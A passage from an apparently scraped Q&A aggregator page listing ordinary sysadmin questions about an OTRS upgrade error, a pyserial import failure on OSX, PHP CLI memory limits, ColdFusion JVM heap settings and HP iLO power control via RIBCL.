(?, ?, ?, 'Text', 'Ticket', '--- {} ', 1, '2012-09-05 15:36:20' , 1, '2012-09-05 15:36:20' , 1)' Traceback (20405): Module: main::_DynamicFieldCreation (v1.85) Line: 466 Module: scripts/DBUpdate-to-3.1.pl (v1.85) Line: 95 Could not create new DynamicField TicketFreeKey1 at scripts/DBUpdate-to-3.1.pl line 477. Step 4 of 24: Create new dynamic fields for free fields (text, key, date)... $ Did anyone else face the same issue? Thanks in advance

    Read the article

  • getting a pyserial not loaded error

    - by skinnyTOD
    I'm getting a "pyserial not loaded" error with the python script fragment below (running OSX 10.7.4). I'm trying to run a python app called Myro for controlling the Parallax Scribbler2 robot - figured it would be a fun way to learn a bit of Python - but I'm not getting out of the gate here. I've searched out all the Myro help docs but like a lot in-progress open source programs, they are a moving target and conflicting, out of date, or not very specific about OSX. I have MacPorts installed and installed py27-serial without error. MacPorts lists the python versions I have installed, along with the active version: Available versions for python: none python24 python25 python25-apple python26 python26-apple python27 python27-apple (active) python32 Perhaps stuff is getting installed in the wrong places or my PATH is wrong (I don't much know what I am doing in Terminal and have probably screwed something up). Trying to find out about my sys.path - here's what I get: import sys sys.path ['', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python27.zip', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-darwin', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/plat-mac/lib-scriptpackages', '/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-tk', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-old', '/System/Library/Frameworks/Python.framework/Versions/2.7/lib/python2.7/lib-dynload', '/System/Library/Frameworks/Python.framework/Versions/2.7/Extras/lib/python/PyObjC', '/Library/Python/2.7/site-packages'] Is that a mess? Can I fix it? Anyway, thanks for reading this far. Here's the python bit that is throwing the error. The error occurs on 'try import serial'. # Global variable robot, to set SerialPort() robot = None pythonVer = "?" rbString = None ptString = None statusText = None # Now, let's import things import urllib import tempfile import os, sys, time try: import serial except: print("WARNING: pyserial not loaded: can't upgrade!") sys.exit() try: input = raw_input # Python 2.x except: pass # Python 3 and better, input is defined try: from tkinter import * pythonver = "3" except: try: from Tkinter import * pythonver = "2" except: pythonver = "?"

    Read the article

  • PHP CLI not respecting memory limit in php.ini

    - by user13743
    I am using drush, which is a command-line php app to manage a drupal website. I am running a command to import a lot of data, which is causing me to hit php's memory limit. PHP Fatal error: Allowed memory size of 536870912 bytes exhausted ... Which is 512MB if I'm doing the math correctly (536870912 / 1024 / 1024 = 512). I've changed the directive in the php.ini that drush uses: $> drush status ... PHP configuration : /etc/php5/cli/php.ini $> grep memory /etc/php5/cli/php.ini ; Maximum amount of memory a script may consume (128MB) ; http://php.net/memory-limit memory_limit = 1024M But I'm still hitting the 512 MB limit! I am running in a virtual machine, whose memory settings I changed from 512 to 1025 MB of RAM to allow drush to run. $> free -m total used free shared buffers cached Mem: 1010 578 431 0 14 392 -/+ buffers/cache: 172 837 Swap: 382 0 382 So it says it has some 431 MB free, now that I've bumped the vm up to 1024. I guess half the memory is being used to run the GUI, but I don't understand how the GUI was running okay when the vm had 512 MB of ram. Why is the PHP cli still hitting a 512 MB memory limit? If it was hitting a system memory limit, shouldn't it die around 431MB, which is what the free command says is available?

    Read the article

  • Coldfusion on VPS, how much JVM heap memory?

    - by Steven Filipowicz
    Recently I got a VPS server and I'm running Coldfusion, the website was running fine until it got more and more traffic and I started to encounter 'OutOfMemory' exceptions. I thought simply to rise the memory of the VPS server, but this didn't help. After doing some Google searches I found a setting in de CF Admin settings to set the JVM Heap memory. It was on the standard: Max Heap size 512MB and Min Heap size was empty. After playing around a bit I have now set it to Min 50MB and Max 200MB, good things is that I'm not getting the 'OutOfMemory' exceptions anymore. So far so good! But with about 50 active visitors on the website, the website starts to get slow. The CPU usage is only about 8% (Windows Taskmanager), also the taskmanager show only about 30% of the 3GB RAM in use. So I'm thinking that my values could be tweaked to use more of the RAM. Honestly I don't understand these JVM Memory heap settings, so I have no clue what is a good setting for me. I found a CF script that displays the memory usage, the details are: Heap Memory Usage - Committed 194 MB Heap Memory Usage - Initial 50.0 MB Heap Memory Usage - Max 194 MB Heap Memory Usage - Used 163 MB JVM - Free Memory 31.2 MB JVM - Max Memory 194 MB JVM - Total Memory 194 MB JVM - Used Memory 163 MB Memory Pool - Code Cache - Used 13.0 MB Memory Pool - PS Eden Space - Used 6.75 MB Memory Pool - PS Old Gen - Used 155 MB Memory Pool - PS Perm Gen - Used 64.2 MB Memory Pool - PS Survivor Space - Used 1.07 MB Non-Heap Memory Usage - Committed 77.4 MB Non-Heap Memory Usage - Initial 18.3 MB Non-Heap Memory Usage - Max 240 MB Non-Heap Memory Usage - Used 77.2 MB Free Allocated Memory: 30mb Total Memory Allocated: 194mb Max Memory Available to JVM: 194mb % of Free Allocated Memory: 16% % of Available Memory Allocated: 100% My JVM arguments are: -server -Dsun.io.useCanonCaches=false -XX:MaxPermSize=192m -XX:+UseParallelGC - Dcoldfusion.rootDir={application.home}/../ -Dcoldfusion.libPath={application.home}/../lib Can I give the JVM more memory? If so, what settings should I use? Thanks very much!!

    Read the article

  • Remote RIB iLO on Proliant via RIBCL

    - by Wudang
    I'm trying to automate a process for our Ops. The process requires that some windows servers running on blades are shut down, left down for a few hours, the restarted when some other processes complete. This is done by an op logging on to each blade's iLO web interface to stop and start. I've been trying to automate this with HP's cpqlocfg program with partial success. I can issue the GET_POWER, GET_USER_INFO, etc commands but SET_HOST_POWER fails in a specific way. Using the cpqlocfg GET_EVENTLOG command I can see the events XML login and the power comand being issued from the iLO interface but then nothing happens. Some hints from googling suggest ACPI isn't configured properly but I can't find any hits on how to verify this. Am I even using the right command? There's also a few other options like PRESS_PWR_BUTTON etc. Problem is I have nowhere to test this, all I can do at the moment is give a script to ops and ask them to try it as 4am on a Sunday when they try the proc. The shutdown is trivial as I can use the windows "shutdown" command, it's the power on that I need help on. Anyone done this? I'd tag this "rib ribcl ilo" but lack the rep points, sorry.

    Read the article

< Previous Page | 814 815 816 817 818 819 820 821 822 823 824 825  | Next Page >